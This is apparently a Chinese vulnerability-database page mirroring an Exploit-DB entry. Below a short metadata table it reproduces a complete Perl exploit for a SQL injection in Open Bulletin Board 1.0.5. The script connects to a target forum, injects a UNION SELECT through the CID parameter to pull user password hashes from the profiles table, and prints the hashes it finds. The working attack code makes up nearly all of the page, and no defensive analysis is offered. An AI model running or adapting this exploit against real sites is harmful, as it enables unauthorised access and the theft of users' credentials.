Open Bulletin Board 1.0.5 – SQL Injection-安全小百科

Open Bulletin Board 1.0.5 – SQL Injection

漏洞ID	1055262	漏洞类型
发布时间	2005-07-18	更新时间	2005-07-18
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1111

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl -w 
  
 # OpenBB sql injection 
 # tested on Open Bulletin Board 1.0.5 with mysql 
 # (c)oded by x97Rang 2005 RST/GHC 
 # Gr33tz:  __blf, 1dt.w0lf 
  
 use IO::Socket; 
  
 if (@ARGV != 3) 
 { 
    print "nUsage: $0 [server] [path] [id]n"; 
    print "like $0 forum.mysite.com / 1n"; 
    print "If found nothing - forum NOT vulnerablenn"; 
    exit (); 
 } 
  
 $server = $ARGV[0]; 
 $path = $ARGV[1]; 
 $id = $ARGV[2]; 
  
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80"); 
 printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0nHost: %snAccept: */*nConnection: closenn", 
  $path,$server,$id); 
  
 while(<$socket>) 
 { 
     if (/>(w{32})</) { print "$1n"; } 
 }

# milw0rm.com [2005-07-18]

相关推荐: Sticker Unauthorized Secure Message Sending Vulnerability

Sticker Unauthorized Secure Message Sending Vulnerability 漏洞ID 1097881 漏洞类型 Access Validation Error 发布时间 2004-10-05 更新时间 2004-10-0…

文章版权归作者所有，未经允许请勿转载。

THE END